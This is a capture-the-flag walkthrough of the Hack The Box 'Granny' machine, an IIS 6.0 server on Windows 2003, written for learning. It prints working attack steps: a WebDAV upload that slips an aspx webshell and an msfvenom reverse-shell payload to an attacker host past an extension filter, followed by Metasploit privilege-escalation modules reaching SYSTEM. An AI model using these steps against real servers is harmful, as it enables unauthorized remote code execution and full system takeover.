Hackthebox - Granny
Windows

Nmap
┌──(kali㉿kali)-[~]
└─$ sudo nmap -T4 -sC -sV -O -Pn -p- 10.10.10.15 1 ⨯
[sudo] password for kali:
Starting Nmap 7.92 ( https://nmap.org ) at 2022-10-09 16:13 EDT
Nmap scan report for 10.10.10.15
Host is up (0.031s latency).
Not shown: 65534 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 6.0
| http-methods:
|_ Potentially risky methods: TRACE DELETE COPY MOVE PROPFIND PROPPATCH SEARCH MKCOL LOCK UNLOCK PUT
|_http-title: Under Construction
| http-webdav-scan:
| Allowed Methods: OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK
| Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
| Server Date: Sun, 09 Oct 2022 20:15:23 GMT
| Server Type: Microsoft-IIS/6.0
|_ WebDAV type: Unknown
|_http-server-header: Microsoft-IIS/6.0
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2003|2008|XP|2000 (91%)
OS CPE: cpe:/o:microsoft:windows_server_2003::sp1 cpe:/o:microsoft:windows_server_2003::sp2 cpe:/o:microsoft:windows_server_2008::sp2 cpe:/o:microsoft:windows_xp::sp3 cpe:/o:microsoft:windows_2000::sp4
Aggressive OS guesses: Microsoft Windows Server 2003 SP1 or SP2 (91%), Microsoft Windows Server 2008 Enterprise SP2 (90%), Microsoft Windows Server 2003 SP2 (89%), Microsoft Windows 2003 SP2 (89%), Microsoft Windows XP SP3 (88%), Microsoft Windows 2000 SP4 or Windows XP Professional SP1 (88%), Microsoft Windows 2000 SP4 (85%), Microsoft Windows XP (85%)
No exact OS matches for host (test conditions non-ideal).
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 101.28 seconds
Port 80
Gobuster
Directory busting
┌──(kali㉿kali)-[~/Documents/granny]
└─$ gobuster dir -u http://10.10.10.15 -w directory-list-2.3-big.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.10.15
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /media/sf_kali-shared/SecLists/Discovery/Web-Content/directory-list-2.3-big.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2022/10/09 15:58:02 Starting gobuster in directory enumeration mode
===============================================================
/images (Status: 301) [Size: 149] [--> http://10.10.10.15/images/]
/Images (Status: 301) [Size: 149] [--> http://10.10.10.15/Images/]
/IMAGES (Status: 301) [Size: 149] [--> http://10.10.10.15/IMAGES/]
/_private (Status: 301) [Size: 153] [--> http://10.10.10.15/%5Fprivate/]
The private folder is useless for now
We can also change our /etc/hosts file and add this list
10.10.10.15 granny.htb
Check for known vulnerabilities
Google fu
While gobuster is running, let's have a look in Google. IIS 6.0 seems to have a possible code execution vulnerability
Nmap with vuln script
Nmap has great scripts including some that will check for know vulnerabilities
┌──(kali㉿kali)-[~/Documents/granny]
└─$ nmap -sV --script=vuln 10.10.10.15
Starting Nmap 7.92 ( https://nmap.org ) at 2022-10-09 16:37 EDT
Nmap scan report for granny.htb (10.10.10.15)
Host is up (0.026s latency).
Not shown: 999 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 6.0
| http-enum:
| /_vti_bin/: Frontpage file or folder
| /postinfo.html: Frontpage file or folder
| /_vti_bin/_vti_aut/author.dll: Frontpage file or folder
| /_vti_bin/_vti_aut/author.exe: Frontpage file or folder
| /_vti_bin/_vti_adm/admin.dll: Frontpage file or folder
| /_vti_bin/_vti_adm/admin.exe: Frontpage file or folder
| /_vti_bin/fpcount.exe?Page=default.asp|Image=3: Frontpage file or folder
| /_vti_bin/shtml.dll: Frontpage file or folder
| /_vti_bin/shtml.exe: Frontpage file or folder
|_ /images/: Potentially interesting folder
|_http-server-header: Microsoft-IIS/6.0
| http-frontpage-login:
| VULNERABLE:
| Frontpage extension anonymous login
| State: VULNERABLE
| Default installations of older versions of frontpage extensions allow anonymous logins which can lead to server compromise.
|
| References:
|_ http://insecure.org/sploits/Microsoft.frontpage.insecurities.html
| vulners:
| cpe:/a:microsoft:internet_information_server:6.0:
| SSV:2903 10.0 https://vulners.com/seebug/SSV:2903 *EXPLOIT*
| PACKETSTORM:82956 10.0 https://vulners.com/packetstorm/PACKETSTORM:82956 *EXPLOIT*
| MS01_033 10.0 https://vulners.com/canvas/MS01_033 *EXPLOIT*
| CVE-2008-0075 10.0 https://vulners.com/cve/CVE-2008-0075
| CVE-2001-0500 10.0 https://vulners.com/cve/CVE-2001-0500
| SSV:30067 7.5 https://vulners.com/seebug/SSV:30067 *EXPLOIT*
| CVE-2007-2897 7.5 https://vulners.com/cve/CVE-2007-2897
| SSV:2902 7.2 https://vulners.com/seebug/SSV:2902 *EXPLOIT*
| CVE-2008-0074 7.2 https://vulners.com/cve/CVE-2008-0074
| CVE-2006-0026 6.5 https://vulners.com/cve/CVE-2006-0026
| VERACODE:21774 5.0 https://vulners.com/veracode/VERACODE:21774
| CVE-2005-2678 5.0 https://vulners.com/cve/CVE-2005-2678
| CVE-2003-0718 5.0 https://vulners.com/cve/CVE-2003-0718
| VERACODE:20937 4.3 https://vulners.com/veracode/VERACODE:20937
| SSV:20121 4.3 https://vulners.com/seebug/SSV:20121 *EXPLOIT*
| CVE-2010-1899 4.3 https://vulners.com/cve/CVE-2010-1899
| CVE-2005-2089 4.3 https://vulners.com/cve/CVE-2005-2089
| VERACODE:31557 4.0 https://vulners.com/veracode/VERACODE:31557
| VERACODE:27647 3.5 https://vulners.com/veracode/VERACODE:27647
|_ CVE-2003-1582 2.6 https://vulners.com/cve/CVE-2003-1582
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 174.43 seconds
The nmap enum is actually better than the wordlist I used with Gobuster. We get a few interesing directories.
Frontpage extension
According to our nmap we should be able to login anonymously. It refers us to this article
Googling around we also find this. Let's use burp and temper with the request.
Using it we can get more info. Our front page user name is "unknown"
The server version is
4.0.2.2611
Davtest
With further research we find this article on null-byte
Davtest is able to create a directory and was able to execute html and txt.
While browsing in the directories disclosed through nmap I saw an asmx file. Let's try to put an an asmx file test there.
Using cadaver
cadaver http://10.10.10.15/DavTestDir_kbmSbjBY
we can connect and upload files. I get forbidden with aspx and asmx files but txt and html works.There is a kali webshell in aspx here
/usr/share/webshells/aspx/cmdasp.aspx
Let's try to upload it as txt and then move it (we can move it with davtest move command)
cp cmdasp.aspx cmdasp.txt
put cmdasp.txt
It works and we have it on the servermove cmdasp.txt cmdasp.aspx
we move itNow that we know we can do this let's make a payload with msfvenom and try to get a reverse shell
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.2 LPORT=4444 -f aspx -o reverse.aspx
.We copy our payload to make a txt version
cp reverse.aspx reverse.txt
We set a listener
rlwrap nc -lnvp 4444
We put the txt file in the server and move it to make it executable by the server
dav:/DavTestDir_kbmSbjBY/> put reverse.txt
Uploading reverse.txt to `/DavTestDir_kbmSbjBY/reverse.txt':
Progress: [=============================>] 100.0% of 2747 bytes succeeded.
dav:/DavTestDir_kbmSbjBY/> move reverse.txt reverse.aspx
Moving `/DavTestDir_kbmSbjBY/reverse.txt' to `/DavTestDir_kbmSbjBY/reverse.aspx': succeeded.
We browse to http://10.10.10.15/DavTestDir_kbmSbjBY/reverse.aspx and get a shell
Our user is "network service"
Privilege escalation
Let's check for possible exploit with
systeminfo
we put the result of the command in a file.Systeminfo
Host Name: GRANNY
OS Name: Microsoft(R) Windows(R) Server 2003, Standard Edition
OS Version: 5.2.3790 Service Pack 2 Build 3790
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Uniprocessor Free
Registered Owner: HTB
Registered Organization: HTB
Product ID: 69712-296-0024942-44782
Original Install Date: 4/12/2017, 5:07:40 PM
System Up Time: 1 Days, 0 Hours, 47 Minutes, 6 Seconds
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: X86-based PC
Processor(s): 1 Processor(s) Installed.
[01]: x86 Family 6 Model 85 Stepping 7 GenuineIntel ~2293 Mhz
BIOS Version: INTEL - 6040000
Windows Directory: C:\WINDOWS
System Directory: C:\WINDOWS\system32
Boot Device: \Device\HarddiskVolume1
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (GMT+02:00) Athens, Beirut, Istanbul, Minsk
Total Physical Memory: 1,023 MB
Available Physical Memory: 758 MB
Page File: Max Size: 2,470 MB
Page File: Available: 2,306 MB
Page File: In Use: 164 MB
Page File Location(s): C:\pagefile.sys
Domain: HTB
Logon Server: N/A
Hotfix(s): 1 Hotfix(s) Installed.
[01]: Q147222
Network Card(s): N/A
We can run windows exploit suggester on it
python3 /opt/wesng/wes.py --color sysinfo.txt | grep -B 3 -A 5 "Privilege"
I want to use metasploit for the privesc so I am going to get a shell using
exploit/windows/iis/iis_webdav_scstoragepathfromurl
This way I will also be able to check local exploit suggester
From our session we can
run multi/recon/local_exploit_suggester
I do not get any result this way but from the previous check with wes we can try a few things like CVE-2014-4076.
We should also migrate the shell because the getuid gives odd results. we just have to ps while in our sessions and find a pid that runs
NT AUTHORITY\NETWORK SERVICE
With a search on metasploit we find this
exploit/windows/local/ms14_070_tcpip_ioctl
We can use it
we set the session with our session id
set session 21
then run and this will elevate our sessionThe session dies really quickly so we need to find another exploit. We can try
CVE-2014-4113
(or MS14_058)We can use
exploit/windows/local/ms14_058_track_popup_menu
Now we have to set session, set LHOST and choose a free port for LPORT.
Then if we run we get another system shell but this time it does not die on us and we can grab the flags.
Last updated